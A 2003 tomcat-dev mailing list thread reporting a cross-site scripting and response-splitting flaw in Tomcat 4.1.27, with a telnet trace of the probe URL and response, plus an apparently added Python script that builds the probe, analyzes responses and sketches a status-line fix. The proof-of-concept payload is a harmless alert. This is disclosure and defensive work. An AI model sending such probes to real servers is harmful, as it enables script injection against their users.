tomcat-dev mailing list archives

From "David Rees" <...@greenhydrant.com>
Subject Re: Jakarta Tomcat 4.1 XSS vulnerability
Date Mon, 29 Sep 2003 18:40:49 GMT
Anyone know how serious this is?

It also appears to affect Tomcat 4.1.27 when using mod_jk.  Below
is a sample trace of an HTTP session.

-Dave

> telnet localhost 8080
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /666%0a%0a<script>alert("asdf");</script>666.jsp HTTP/1.0
Host: localhost

HTTP/1.1 404 /666

<script>alert("asdf");</script>666.jsp
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Mon, 29 Sep 2003 18:39:23 GMT
Server: Apache Coyote/1.0
Connection: close

<html><head><title>Apache Tomcat/4.1.27 - Error
report</title><STYLE><!--H1{font-family : sans-serif,Arial,Tahoma;color :
white;background-color : #0086b2;} H3{font-family :
sans-serif,Arial,Tahoma;color : white;background-color : #0086b2;}
BODY{font-family : sans-serif,Arial,Tahoma;color : black;background-color
: white;} B{color : white;background-color : #0086b2;} HR{color :
#0086b2;} --></STYLE> </head><body><h1>HTTP Status 404 - /666

&lt;script&gt;alert(&quot;asdf&quot;);&lt;/script&gt;666.jsp</h1><HR
size="1" noshade><p><b>type</b> Status report</p><p><b>message</b>
<u>/666

&lt;script&gt;alert(&quot;asdf&quot;);&lt;/script&gt;666.jsp</u></p><p><b>description</b>
<u>The requested resource (/666

&lt;script&gt;alert(&quot;asdf&quot;);&lt;/script&gt;666.jsp) is not
available.</u></p><HR size="1" noshade><h3>Apache
Tomcat/4.1.27</h3></body></html>Connection closed by foreign host.

On Sun, September 28, 2003 at 3:14 am, Kan Ogawa sent the following
>
> Jakarta Tomcat 4.1 cross-site scripting vulnerability, which was
> reported last year, is not yet resolved.
>
> http://www.securityfocus.com/archive/82/288502/2002-08-16/2002-08-22/0
>
> I verified this vulnerability on Tomcat 4.1.27 with Coyote HTTP/1.1
> connector.
>
> http://localhost:8080/666%0a%0a<script>alert("asdf");</script>666.jsp
>
> On the other hand, on Tomcat 5.0, it was not reproduced.
> Have you neglected to fix it in Tomcat 4.x, Tomcat committers?
>
> Regards,
>
> --
> Kan Ogawa
> super-creek@jcom.home.ne.jp
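The split response in the trace above, reproduced offline as an added example (my code, not code from this thread or from Tomcat): it builds the same probe request, reads two constructed responses the way a browser would, and reports whether the decoded %0a%0a ended the header block early. The sanitize_reason check is what a connector that echoes the request path into the status line needs; it is an assumption about the general fix, not Tomcat's actual patch, which this thread does not show.

```python
import re

# Payload from the telnet session above (the same literal Kan Ogawa and
# David Rees used).
MARKER = '<script>alert("asdf");</script>'


def build_probe(host="localhost", marker=MARKER):
    """Request line from the trace above. %0a%0a is a URL-encoded pair of
    line feeds; a connector that decodes the path and then echoes it into
    the status line writes those line feeds straight onto the wire."""
    path = "/666%0a%0a" + marker + "666.jsp"
    return "GET {} HTTP/1.0\r\nHost: {}\r\n\r\n".format(path, host)


_STATUS_LINE = re.compile(r"^HTTP/\d\.\d (\d{3})(?: (.*))?$")
_HEADER_IN_BODY = re.compile(r"^(Content-Type|Server|Date):", re.M | re.I)


def analyze(raw, marker=MARKER):
    """Read a raw response the way a browser does: the head ends at the
    first blank line, everything after it is the body. Returns what the
    client actually sees plus a verdict on whether the response was split."""
    text = raw.decode("latin-1")
    gap = re.search(r"\r?\n\r?\n", text)
    head, body = (text[:gap.start()], text[gap.end():]) if gap else (text, "")
    lines = [line.rstrip("\r") for line in head.split("\n")]
    status = _STATUS_LINE.match(lines[0])
    code = status.group(1) if status else None
    reason = (status.group(2) or "") if status else ""
    header_names = [line.split(":", 1)[0].lower() for line in lines[1:] if ":" in line]
    leaked = _HEADER_IN_BODY.search(body) is not None   # real headers became body text
    unescaped = marker in body                          # script tag reaches the body raw
    return {
        "status": code,
        "reason": reason,
        "header_names": header_names,
        "headers_leaked_into_body": leaked,
        "marker_unescaped_in_body": unescaped,
        "split": leaked or ("content-type" not in header_names and unescaped),
    }


def sanitize_reason(reason):
    """The check a connector needs before echoing anything into the status
    line: CR, LF and other control characters may not appear there (an RFC
    2616 reason phrase is TEXT). Assumed general fix, not Tomcat's patch."""
    return re.sub(r"[\x00-\x1f\x7f]+", " ", reason).strip()


def status_line(code, reason):
    """Status line that cannot be split, whatever the caller passes as reason."""
    return "HTTP/1.1 {} {}\r\n".format(code, sanitize_reason(reason))


# Constructed responses (not captured from a server): the first reproduces
# the split response in the trace above, with bare LFs where the decoded
# %0a%0a landed; the second is what a connector that keeps the reason phrase
# on one line and escapes the echoed path would send.
VULNERABLE_RESPONSE = (
    "HTTP/1.1 404 /666\n\n" + MARKER + "666.jsp\r\n"
    "Content-Type: text/html;charset=ISO-8859-1\r\n"
    "Server: Apache Coyote/1.0\r\n"
    "Connection: close\r\n"
    "\r\n"
    "<html><body><h1>HTTP Status 404 - /666 "
    "&lt;script&gt;alert(&quot;asdf&quot;);&lt;/script&gt;666.jsp</h1></body></html>"
).encode("latin-1")

FIXED_RESPONSE = (
    "HTTP/1.1 404 Not Found\r\n"
    "Content-Type: text/html;charset=ISO-8859-1\r\n"
    "Server: Apache Coyote/1.0\r\n"
    "Connection: close\r\n"
    "\r\n"
    "<html><body><h1>HTTP Status 404 - /666 "
    "&lt;script&gt;alert(&quot;asdf&quot;);&lt;/script&gt;666.jsp</h1></body></html>"
).encode("latin-1")


if __name__ == "__main__":
    print(build_probe())
    for name, raw in (("vulnerable", VULNERABLE_RESPONSE), ("fixed", FIXED_RESPONSE)):
        print(name, analyze(raw))
    print(repr(status_line(404, "/666\n\n" + MARKER + "666.jsp")))
```

To test a live server, send build_probe() over a socket and pass the reply to analyze(). For the response in the trace above, the client sees a head consisting of the status line alone, a body that starts with the raw script tag, and the real Content-Type header as body text, which is why the escaped copy inside the HTML error page does not help. Stripping control characters keeps the status line on one line; not echoing the request path into the reason phrase at all is the simpler choice.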

